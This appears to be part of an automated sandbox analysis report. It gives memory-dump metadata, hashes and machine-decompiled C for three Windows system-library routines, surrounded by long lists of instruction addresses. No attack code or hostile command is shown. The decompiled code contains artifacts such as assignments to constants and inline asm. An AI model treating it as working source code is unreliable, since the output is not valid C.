                        0x02ba8662
                        0x02ba8662
                        0x02ba8662
                        0x02ba8666
                        0x00000000
                        0x02ba8666
                        0x02ba85b7
                        0x02ba85b9
                        0x02ba85bc
                        0x02ba85bf
                        0x02ba85cc
                        0x02ba85d1
                        0x02ba85d4
                        0x02ba85db
                        0x02ba85de
                        0x02ba85e0
                        0x02bf9b5f
                        0x00000000
                        0x02bf9b5f
                        0x02ba85e6
                        0x02ba85ea
                        0x02ba86c3
                        0x02ba86c5
                        0x02ba86c8
                        0x02ba86ca
                        0x02bf9b16
                        0x00000000
                        0x02bf9b16
                        0x02ba86d6
                        0x02ba85f6
                        0x02ba85f6
                        0x02ba85f9
                        0x02ba8602
                        0x02ba8606
                        0x02ba860a
                        0x02ba860b
                        0x02ba860e
                        0x02ba8611
                        0x00000000
                        0x02ba8611
                        0x02ba85f3
                        0x00000000
                        0x02ba85f3
                        0x02ba8619
                        0x02ba861e
                        0x02ba861e
                        0x02ba8621
                        0x02ba8622
                        0x02ba8623
                        0x02ba8625
                        0x02ba862c
                        0x00000000
                        0x02ba873d
                        0x00000000
                        0x02ba873d
                        0x02ba8737
                        0x02ba850f
                        0x02ba8512
                        0x00000000
                        0x02ba8512
                        0x00000000
                        0x02ba84d6

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ca165ac8219114522425fa1dc045665369cc9972c6438ae43146a8fffbd950cf
                        • Instruction ID: 9de47ba73c2879512273812bdf21d43ca298ddf6b901594244a5b884b61b57d8
                        • Opcode Fuzzy Hash: ca165ac8219114522425fa1dc045665369cc9972c6438ae43146a8fffbd950cf
                        • Instruction Fuzzy Hash: A1B18C74E04249DFDB15DFA8C994BADFBB6FF48304F1481AAE505AB641EB70A845CF80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02BC513A(intOrPtr __ecx, void* __edx) {
                        				signed int _v8;
                        				signed char _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				char _v63;
                        				char _v64;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _v84;
                        				signed int _v88;
                        				signed char* _v92;
                        				signed int _v100;
                        				signed int _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t157;
                        				signed int _t159;
                        				signed int _t160;
                        				unsigned int* _t161;
                        				intOrPtr _t165;
                        				signed int _t172;
                        				signed char* _t181;
                        				intOrPtr _t189;
                        				intOrPtr* _t200;
                        				signed int _t202;
                        				signed int _t203;
                        				char _t204;
                        				signed int _t207;
                        				signed int _t208;
                        				void* _t209;
                        				intOrPtr _t210;
                        				signed int _t212;
                        				signed int _t214;
                        				signed int _t221;
                        				signed int _t222;
                        				signed int _t226;
                        				intOrPtr* _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				intOrPtr _t237;
                        				intOrPtr _t238;
                        				intOrPtr _t240;
                        				void* _t245;
                        				signed int _t246;
                        				signed int _t247;
                        				void* _t248;
                        				void* _t251;
                        				void* _t252;
                        				signed int _t253;
                        				signed int _t255;
                        				signed int _t256;
                        
                        				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x2c8d360 ^ _t255;
                        				_v32 = _v32 & 0x00000000;
                        				_t251 = __edx;
                        				_t237 = __ecx;
                        				_t212 = 6;
                        				_t245 =  &_v84;
                        				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                        				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v48 = __ecx;
                        				_v36 = _t207;
                        				_t157 = memset(_t245, 0, _t212 << 2);
                        				_t256 = _t255 + 0xc;
                        				_t246 = _t245 + _t212;
                        				if(_t207 == 2) {
                        					_t247 =  *(_t237 + 0x60);
                        					_t208 =  *(_t237 + 0x64);
                        					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                        					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                        					_v104 = _t159;
                        					_v76 = _t159;
                        					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                        					_v100 = _t160;
                        					_v72 = _t160;
                        					L19:
                        					_v80 = _t208;
                        					_v84 = _t247;
                        					L8:
                        					_t214 = 0;
                        					if( *(_t237 + 0x74) > 0) {
                        						_t82 = _t237 + 0x84; // 0x124
                        						_t161 = _t82;
                        						_v92 = _t161;
                        						while( *_t161 >> 0x1f != 0) {
                        							_t200 = _v92;
                        							if( *_t200 == 0x80000000) {
                        								break;
                        							}
                        							_t214 = _t214 + 1;
                        							_t161 = _t200 + 0x10;
                        							_v92 = _t161;
                        							if(_t214 <  *(_t237 + 0x74)) {
                        								continue;
                        							}
                        							goto L9;
                        						}
                        						_v88 = _t214 << 4;
                        						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                        						_t165 = 0;
                        						asm("adc eax, [ecx+edx+0x7c]");
                        						_v24 = _t165;
                        						_v28 = _v40;
                        						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                        						_t221 = _v40;
                        						_v16 =  *_v92;
                        						_v32 =  &_v28;
                        						if( *(_t237 + 0x4e) >> 0xf == 0) {
                        							goto L9;
                        						}
                        						_t240 = _v48;
                        						if( *_v92 != 0x80000000) {
                        							goto L9;
                        						}
                        						 *((intOrPtr*)(_t221 + 8)) = 0;
                        						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                        						_t226 = 0;
                        						_t181 = _t251 + 0x66;
                        						_v88 = 0;
                        						_v92 = _t181;
                        						do {
                        							if( *((char*)(_t181 - 2)) == 0) {
                        								goto L31;
                        							}
                        							_t226 = _v88;
                        							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                        								_t181 = E02BDD0F0(1, _t226 + 0x20, 0);
                        								_t226 = _v40;
                        								 *(_t226 + 8) = _t181;
                        								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                        								L34:
                        								if(_v44 == 0) {
                        									goto L9;
                        								}
                        								_t210 = _v44;
                        								_t127 = _t210 + 0x1c; // 0x1c
                        								_t249 = _t127;
                        								E02BB2280(_t181, _t127);
                        								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                        								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                        								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                        								}
                        								_t189 = L02BB4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                        								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                        								if(_t189 != 0) {
                        									 *((intOrPtr*)(_t189 + 8)) = _v20;
                        									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                        									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                        									 *_t232 = _t232 + 0x10;
                        									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                        									E02BDF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                        									_t256 = _t256 + 0xc;
                        								}
                        								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                        								E02BAFFB0(_t210, _t249, _t249);
                        								_t222 = _v76;
                        								_t172 = _v80;
                        								_t208 = _v84;
                        								_t247 = _v88;
                        								L10:
                        								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                        								_v44 = _t238;
                        								if(_t238 != 0) {
                        									 *0x2c8b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                        									_v44();
                        								}
                        								_pop(_t248);
                        								_pop(_t252);
                        								_pop(_t209);
                        								return E02BDB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                        							}
                        							_t181 = _v92;
                        							L31:
                        							_t226 = _t226 + 1;
                        							_t181 =  &(_t181[0x18]);
                        							_v88 = _t226;
                        							_v92 = _t181;
                        						} while (_t226 < 4);
                        						goto L34;
                        					}
                        					L9:
                        					_t172 = _v104;
                        					_t222 = _v100;
                        					goto L10;
                        				}
                        				_t247 = _t246 | 0xffffffff;
                        				_t208 = _t247;
                        				_v84 = _t247;
                        				_v80 = _t208;
                        				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                        					_t233 = _v72;
                        					_v105 = _v64;
                        					_t202 = _v76;
                        				} else {
                        					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                        					_v105 = 1;
                        					if(_v63 <= _t204) {
                        						_v63 = _t204;
                        					}
                        					_t202 = _v76 |  *(_t251 + 0x40);
                        					_t233 = _v72 |  *(_t251 + 0x44);
                        					_t247 =  *(_t251 + 0x38);
                        					_t208 =  *(_t251 + 0x3c);
                        					_v76 = _t202;
                        					_v72 = _t233;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				_v104 = _t202;
                        				_v100 = _t233;
                        				if( *((char*)(_t251 + 0xc4)) != 0) {
                        					_t237 = _v48;
                        					_v105 = 1;
                        					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                        						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                        						_t237 = _v48;
                        					}
                        					_t203 = _t202 |  *(_t251 + 0xb8);
                        					_t234 = _t233 |  *(_t251 + 0xbc);
                        					_t247 = _t247 &  *(_t251 + 0xb0);
                        					_t208 = _t208 &  *(_t251 + 0xb4);
                        					_v104 = _t203;
                        					_v76 = _t203;
                        					_v100 = _t234;
                        					_v72 = _t234;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				if(_v105 == 0) {
                        					_v36 = _v36 & 0x00000000;
                        					_t208 = 0;
                        					_t247 = 0;
                        					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                        					goto L19;
                        				} else {
                        					_v36 = 1;
                        					goto L8;
                        				}
                        			}































































                        0x02bc5142
                        0x02bc514c
                        0x02bc5150
                        0x02bc5157
                        0x02bc5159
                        0x02bc515e
                        0x02bc5165
                        0x02bc5169
                        0x02bc516c
                        0x02bc5172
                        0x02bc5176
                        0x02bc517a
                        0x02bc517a
                        0x02bc517a
                        0x02bc517f
                        0x02c06d8b
                        0x02c06d8e
                        0x02c06d91
                        0x02c06d95
                        0x02c06d98
                        0x02c06d9c
                        0x02c06da0
                        0x02c06da3
                        0x02c06da7
                        0x02c06e26
                        0x02c06e26
                        0x02c06e2a
                        0x02bc51f9
                        0x02bc51f9
                        0x02bc51fe
                        0x02c06e33
                        0x02c06e33
                        0x02c06e39
                        0x02c06e3d
                        0x02c06e46
                        0x02c06e50
                        0x00000000
                        0x00000000
                        0x02c06e52
                        0x02c06e53
                        0x02c06e56
                        0x02c06e5d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c06e5f
                        0x02c06e67
                        0x02c06e77
                        0x02c06e7f
                        0x02c06e80
                        0x02c06e88
                        0x02c06e90
                        0x02c06e9f
                        0x02c06ea5
                        0x02c06ea9
                        0x02c06eb1
                        0x02c06ebf
                        0x00000000
                        0x00000000
                        0x02c06ecf
                        0x02c06ed3
                        0x00000000
                        0x00000000
                        0x02c06edb
                        0x02c06ede
                        0x02c06ee1
                        0x02c06ee8
                        0x02c06eeb
                        0x02c06eed
                        0x02c06ef0
                        0x02c06ef4
                        0x02c06ef8
                        0x02c06efc
                        0x00000000
                        0x00000000
                        0x02c06f0d
                        0x02c06f11
                        0x02c06f32
                        0x02c06f37
                        0x02c06f3b
                        0x02c06f3e
                        0x02c06f41
                        0x02c06f46
                        0x00000000
                        0x00000000
                        0x02c06f4c
                        0x02c06f50
                        0x02c06f50
                        0x02c06f54
                        0x02c06f62
                        0x02c06f65
                        0x02c06f6d
                        0x02c06f7b
                        0x02c06f7b
                        0x02c06f93
                        0x02c06f98
                        0x02c06fa0
                        0x02c06fa6
                        0x02c06fb3
                        0x02c06fb6
                        0x02c06fbf
                        0x02c06fc1
                        0x02c06fd5
                        0x02c06fda
                        0x02c06fda
                        0x02c06fdd
                        0x02c06fe2
                        0x02c06fe7
                        0x02c06feb
                        0x02c06fef
                        0x02c06ff3
                        0x02bc520c
                        0x02bc520c
                        0x02bc520f
                        0x02bc5215
                        0x02bc5234
                        0x02bc523a
                        0x02bc523a
                        0x02bc5244
                        0x02bc5245
                        0x02bc5246
                        0x02bc5251
                        0x02bc5251
                        0x02c06f13
                        0x02c06f17
                        0x02c06f17
                        0x02c06f18
                        0x02c06f1b
                        0x02c06f1f
                        0x02c06f23
                        0x00000000
                        0x02c06f28
                        0x02bc5204
                        0x02bc5204
                        0x02bc5208
                        0x00000000
                        0x02bc5208
                        0x02bc5185
                        0x02bc5188
                        0x02bc518a
                        0x02bc518e
                        0x02bc5195
                        0x02c06db1
                        0x02c06db5
                        0x02c06db9
                        0x02bc519b
                        0x02bc519b
                        0x02bc519e
                        0x02bc51a7
                        0x02bc51a9
                        0x02bc51a9
                        0x02bc51b5
                        0x02bc51b8
                        0x02bc51bb
                        0x02bc51be
                        0x02bc51c1
                        0x02bc51c5
                        0x02bc51c9
                        0x02bc51cd
                        0x02bc51cd
                        0x02bc51d8
                        0x02bc51dc
                        0x02bc51e0
                        0x02c06dcc
                        0x02c06dd0
                        0x02c06dd5
                        0x02c06ddd
                        0x02c06de1
                        0x02c06de1
                        0x02c06de5
                        0x02c06deb
                        0x02c06df1
                        0x02c06df7
                        0x02c06dfd
                        0x02c06e01
                        0x02c06e05
                        0x02c06e09
                        0x02c06e0d
                        0x02c06e11
                        0x02c06e11
                        0x02bc51eb
                        0x02c06e1a
                        0x02c06e1f
                        0x02c06e21
                        0x02c06e23
                        0x00000000
                        0x02bc51f1
                        0x02bc51f1
                        0x00000000
                        0x02bc51f1

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34fae4fc96325042884092c1bd8817d94033d1a8244b6327e933c794daa58479
                        • Instruction ID: 7fd371024edd3f5eb6bee438c66ddfbfc3263e270f178f8e5bd1c46b5ab118eb
                        • Opcode Fuzzy Hash: 34fae4fc96325042884092c1bd8817d94033d1a8244b6327e933c794daa58479
                        • Instruction Fuzzy Hash: 55C114755093818FD354CF28C580A5AFBF1BF88308F2449ADF8999B392D771E945CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E02BC03E2(signed int __ecx, signed int __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				char _v52;
                        				char _v56;
                        				char _v64;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t56;
                        				signed int _t58;
                        				char* _t64;
                        				intOrPtr _t65;
                        				signed int _t74;
                        				signed int _t79;
                        				char* _t83;
                        				intOrPtr _t84;
                        				signed int _t93;
                        				signed int _t94;
                        				signed char* _t95;
                        				signed int _t99;
                        				signed int _t100;
                        				signed char* _t101;
                        				signed int _t105;
                        				signed int _t119;
                        				signed int _t120;
                        				void* _t122;
                        				signed int _t123;
                        				signed int _t127;
                        
                        				_v8 =  *0x2c8d360 ^ _t127;
                        				_t119 = __ecx;
                        				_t105 = __edx;
                        				_t118 = 0;
                        				_v20 = __edx;
                        				_t120 =  *(__ecx + 0x20);
                        				if(E02BC0548(__ecx, 0) != 0) {
                        					_t56 = 0xc000022d;
                        					L23:
                        					return E02BDB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                        				} else {
                        					_v12 = _v12 | 0xffffffff;
                        					_t58 = _t120 + 0x24;
                        					_t109 =  *(_t120 + 0x18);
                        					_t118 = _t58;
                        					_v16 = _t58;
                        					E02BAB02A( *(_t120 + 0x18), _t118, 0x14a5);
                        					_v52 = 0x18;
                        					_v48 = 0;
                        					0x840 = 0x40;
                        					if( *0x2c87c1c != 0) {
                        					}
                        					_v40 = 0x840;
                        					_v44 = _t105;
                        					_v36 = 0;
                        					_v32 = 0;
                        					if(E02BB7D50() != 0) {
                        						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t64 = 0x7ffe0384;
                        					}
                        					if( *_t64 != 0) {
                        						_t65 =  *[fs:0x30];
                        						__eflags =  *(_t65 + 0x240) & 0x00000004;
                        						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                        							_t100 = E02BB7D50();
                        							__eflags = _t100;
                        							if(_t100 == 0) {
                        								_t101 = 0x7ffe0385;
                        							} else {
                        								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t101 & 0x00000020;
                        							if(( *_t101 & 0x00000020) != 0) {
                        								_t118 = _t118 | 0xffffffff;
                        								_t109 = 0x1485;
                        								E02C17016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					_t105 = 0;
                        					while(1) {
                        						_push(0x60);
                        						_push(5);
                        						_push( &_v64);
                        						_push( &_v52);
                        						_push(0x100021);
                        						_push( &_v12);
                        						_t122 = E02BD9830();
                        						if(_t122 >= 0) {
                        							break;
                        						}
                        						__eflags = _t122 - 0xc0000034;
                        						if(_t122 == 0xc0000034) {
                        							L38:
                        							_t120 = 0xc0000135;
                        							break;
                        						}
                        						__eflags = _t122 - 0xc000003a;
                        						if(_t122 == 0xc000003a) {
                        							goto L38;
                        						}
                        						__eflags = _t122 - 0xc0000022;
                        						if(_t122 != 0xc0000022) {
                        							break;
                        						}
                        						__eflags = _t105;
                        						if(__eflags != 0) {
                        							break;
                        						}
                        						_t109 = _t119;
                        						_t99 = E02C169A6(_t119, __eflags);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							break;
                        						}
                        						_t105 = _t105 + 1;
                        					}
                        					if( !_t120 >= 0) {
                        						L22:
                        						_t56 = _t120;
                        						goto L23;
                        					}
                        					if( *0x2c87c04 != 0) {
                        						_t118 = _v12;
                        						_t120 = E02C1A7AC(_t119, _t118, _t109);
                        						__eflags = _t120;
                        						if(_t120 >= 0) {
                        							goto L10;
                        						}
                        						__eflags =  *0x2c87bd8;
                        						if( *0x2c87bd8 != 0) {
                        							L20:
                        							if(_v12 != 0xffffffff) {
                        								_push(_v12);
                        								E02BD95D0();
                        							}
                        							goto L22;
                        						}
                        					}
                        					L10:
                        					_push(_v12);
                        					_t105 = _t119 + 0xc;
                        					_push(0x1000000);
                        					_push(0x10);
                        					_push(0);
                        					_push(0);
                        					_push(0xf);
                        					_push(_t105);
                        					_t120 = E02BD99A0();
                        					if(_t120 < 0) {
                        						__eflags = _t120 - 0xc000047e;
                        						if(_t120 == 0xc000047e) {
                        							L51:
                        							_t74 = E02C13540(_t120);
                        							_t119 = _v16;
                        							_t120 = _t74;
                        							L52:
                        							_t118 = 0x1485;
                        							E02B9B1E1(_t120, 0x1485, 0, _t119);
                        							goto L20;
                        						}
                        						__eflags = _t120 - 0xc000047f;
                        						if(_t120 == 0xc000047f) {
                        							goto L51;
                        						}
                        						__eflags = _t120 - 0xc0000462;
                        						if(_t120 == 0xc0000462) {
                        							goto L51;
                        						}
                        						_t119 = _v16;
                        						__eflags = _t120 - 0xc0000017;
                        						if(_t120 != 0xc0000017) {
                        							__eflags = _t120 - 0xc000009a;
                        							if(_t120 != 0xc000009a) {
                        								__eflags = _t120 - 0xc000012d;
                        								if(_t120 != 0xc000012d) {
                        									_v28 = _t119;
                        									_push( &_v56);
                        									_push(1);
                        									_v24 = _t120;
                        									_push( &_v28);
                        									_push(1);
                        									_push(2);
                        									_push(0xc000007b);
                        									_t79 = E02BDAAF0();
                        									__eflags = _t79;
                        									if(_t79 >= 0) {
                        										__eflags =  *0x2c88474 - 3;
                        										if( *0x2c88474 != 3) {
                        											 *0x2c879dc =  *0x2c879dc + 1;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						goto L52;
                        					}
                        					if(E02BB7D50() != 0) {
                        						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t83 = 0x7ffe0384;
                        					}
                        					if( *_t83 != 0) {
                        						_t84 =  *[fs:0x30];
                        						__eflags =  *(_t84 + 0x240) & 0x00000004;
                        						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                        							_t94 = E02BB7D50();
                        							__eflags = _t94;
                        							if(_t94 == 0) {
                        								_t95 = 0x7ffe0385;
                        							} else {
                        								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t95 & 0x00000020;
                        							if(( *_t95 & 0x00000020) != 0) {
                        								E02C17016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                        						if( *0x2c88708 != 0) {
                        							_t118 =  *0x7ffe0330;
                        							_t123 =  *0x2c87b00; // 0x0
                        							asm("ror esi, cl");
                        							 *0x2c8b1e0(_v12, _v20, 0x20);
                        							_t93 =  *(_t123 ^  *0x7ffe0330)();
                        							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                        							asm("sbb esi, esi");
                        							_t120 =  ~_t50 & _t93;
                        						} else {
                        							_t120 = 0;
                        						}
                        					}
                        					if( !_t120 >= 0) {
                        						L19:
                        						_push( *_t105);
                        						E02BD95D0();
                        						 *_t105 =  *_t105 & 0x00000000;
                        						goto L20;
                        					}
                        					_t120 = E02BA7F65(_t119);
                        					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                        						__eflags = _t120;
                        						if(_t120 < 0) {
                        							goto L19;
                        						}
                        						 *(_t119 + 0x64) = _v12;
                        						goto L22;
                        					}
                        					goto L19;
                        				}
                        			}








































                        0x02bc03f1
                        0x02bc03f7
                        0x02bc03f9
                        0x02bc03fb
                        0x02bc03fd
                        0x02bc0400
                        0x02bc040a
                        0x02c04c7a
                        0x02bc0537
                        0x02bc0547
                        0x02bc0410
                        0x02bc0410
                        0x02bc0414
                        0x02bc0417
                        0x02bc041a
                        0x02bc0421
                        0x02bc0424
                        0x02bc042b
                        0x02bc043b
                        0x02bc043e
                        0x02bc043f
                        0x02bc043f
                        0x02bc0446
                        0x02bc0449
                        0x02bc044c
                        0x02bc044f
                        0x02bc0459
                        0x02c04c8d
                        0x02bc045f
                        0x02bc045f
                        0x02bc045f
                        0x02bc0467
                        0x02c04c97
                        0x02c04c9d
                        0x02c04ca4
                        0x02c04caa
                        0x02c04caf
                        0x02c04cb1
                        0x02c04cc3
                        0x02c04cb3
                        0x02c04cbc
                        0x02c04cbc
                        0x02c04cc8
                        0x02c04ccb
                        0x02c04cd7
                        0x02c04cda
                        0x02c04cdf
                        0x02c04cdf
                        0x02c04ccb
                        0x02c04ca4
                        0x02bc046d
                        0x02bc046f
                        0x02bc046f
                        0x02bc0471
                        0x02bc0476
                        0x02bc047a
                        0x02bc047b
                        0x02bc0483
                        0x02bc0489
                        0x02bc048d
                        0x00000000
                        0x00000000
                        0x02c04ce9
                        0x02c04cef
                        0x02c04d22
                        0x02c04d22
                        0x00000000
                        0x02c04d22
                        0x02c04cf1
                        0x02c04cf7
                        0x00000000
                        0x00000000
                        0x02c04cf9
                        0x02c04cff
                        0x00000000
                        0x00000000
                        0x02c04d05
                        0x02c04d07
                        0x00000000
                        0x00000000
                        0x02c04d0d
                        0x02c04d0f
                        0x02c04d14
                        0x02c04d16
                        0x00000000
                        0x00000000
                        0x02c04d1c
                        0x02c04d1c
                        0x02bc0499
                        0x02bc0535
                        0x02bc0535
                        0x00000000
                        0x02bc0535
                        0x02bc04a6
                        0x02c04d2c
                        0x02c04d37
                        0x02c04d39
                        0x02c04d3b
                        0x00000000
                        0x00000000
                        0x02c04d41
                        0x02c04d48
                        0x02bc0527
                        0x02bc052b
                        0x02bc052d
                        0x02bc0530
                        0x02bc0530
                        0x00000000
                        0x02bc052b
                        0x02c04d4e
                        0x02bc04ac
                        0x02bc04ac
                        0x02bc04af
                        0x02bc04b2
                        0x02bc04b7
                        0x02bc04b9
                        0x02bc04bb
                        0x02bc04bd
                        0x02bc04bf
                        0x02bc04c5
                        0x02bc04c9
                        0x02c04d53
                        0x02c04d59
                        0x02c04db9
                        0x02c04dba
                        0x02c04dbf
                        0x02c04dc2
                        0x02c04dc4
                        0x02c04dc7
                        0x02c04dce
                        0x00000000
                        0x02c04dce
                        0x02c04d5b
                        0x02c04d61
                        0x00000000
                        0x00000000
                        0x02c04d63
                        0x02c04d69
                        0x00000000
                        0x00000000
                        0x02c04d6b
                        0x02c04d6e
                        0x02c04d74
                        0x02c04d76
                        0x02c04d7c
                        0x02c04d7e
                        0x02c04d84
                        0x02c04d89
                        0x02c04d8c
                        0x02c04d8d
                        0x02c04d92
                        0x02c04d95
                        0x02c04d96
                        0x02c04d98
                        0x02c04d9a
                        0x02c04d9f
                        0x02c04da4
                        0x02c04da6
                        0x02c04da8
                        0x02c04daf
                        0x02c04db1
                        0x02c04db1
                        0x02c04daf
                        0x02c04da6
                        0x02c04d84
                        0x02c04d7c
                        0x00000000
                        0x02c04d74
                        0x02bc04d6
                        0x02c04de1
                        0x02bc04dc
                        0x02bc04dc
                        0x02bc04dc
                        0x02bc04e4
                        0x02c04deb
                        0x02c04df1
                        0x02c04df8
                        0x02c04dfe
                        0x02c04e03
                        0x02c04e05
                        0x02c04e17
                        0x02c04e07
                        0x02c04e10
                        0x02c04e10
                        0x02c04e1c
                        0x02c04e1f
                        0x02c04e35
                        0x02c04e35
                        0x02c04e1f
                        0x02c04df8
                        0x02bc04f1
                        0x02bc04fa
                        0x02c04e3f
                        0x02c04e47
                        0x02c04e5b
                        0x02c04e61
                        0x02c04e67
                        0x02c04e69
                        0x02c04e71
                        0x02c04e73
                        0x02bc0500
                        0x02bc0500
                        0x02bc0500
                        0x02bc04fa
                        0x02bc0508
                        0x02bc051d
                        0x02bc051d
                        0x02bc051f
                        0x02bc0524
                        0x00000000
                        0x02bc0524
                        0x02bc0515
                        0x02bc0517
                        0x02c04e7a
                        0x02c04e7c
                        0x00000000
                        0x00000000
                        0x02c04e85
                        0x00000000
                        0x02c04e85
                        0x00000000
                        0x02bc0517

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02168286031c990de2e07b8c73a756822dc12d4b95ba4accfa8aeae2d21e981b
                        • Instruction ID: 58cd93a5e8099637849be147202044b33beb3eb6d07d3b9df6602e7c1714189f
                        • Opcode Fuzzy Hash: 02168286031c990de2e07b8c73a756822dc12d4b95ba4accfa8aeae2d21e981b
                        • Instruction Fuzzy Hash: F8912831E00754DFDB35AB68C884BBFB7B5EB41718F1906A5EA10A72D1DB749E00CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02B9C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				char _v1036;
                        				signed int _v1040;
                        				char _v1048;
                        				signed int _v1052;
                        				signed char _v1056;
                        				void* _v1058;
                        				char _v1060;
                        				signed int _v1064;
                        				void* _v1068;
                        				intOrPtr _v1072;
                        				void* _v1084;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t70;
                        				intOrPtr _t72;
                        				signed int _t74;
                        				intOrPtr _t77;
                        				signed int _t78;
                        				signed int _t81;
                        				void* _t101;
                        				signed int _t102;
                        				signed int _t107;
                        				signed int _t109;
                        				signed int _t110;
                        				signed char _t111;
                        				signed int _t112;
                        				signed int _t113;
                        				signed int _t114;
                        				intOrPtr _t116;
                        				void* _t117;
                        				char _t118;
                        				void* _t120;
                        				char _t121;
                        				signed int _t122;
                        				signed int _t123;
                        				signed int _t125;
                        
                        				_t125 = (_t123 & 0xfffffff8) - 0x424;
                        				_v8 =  *0x2c8d360 ^ _t125;
                        				_t116 = _a4;
                        				_v1056 = _a16;
                        				_v1040 = _a24;
                        				if(E02BA6D30( &_v1048, _a8) < 0) {
                        					L4:
                        					_pop(_t117);
                        					_pop(_t120);
                        					_pop(_t101);
                        					return E02BDB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                        				}
                        				_t70 = _a20;
                        				if(_t70 >= 0x3f4) {
                        					_t121 = _t70 + 0xc;
                        					L19:
                        					_t107 =  *( *[fs:0x30] + 0x18);
                        					__eflags = _t107;
                        					if(_t107 == 0) {
                        						L60:
                        						_t68 = 0xc0000017;
                        						goto L4;
                        					}
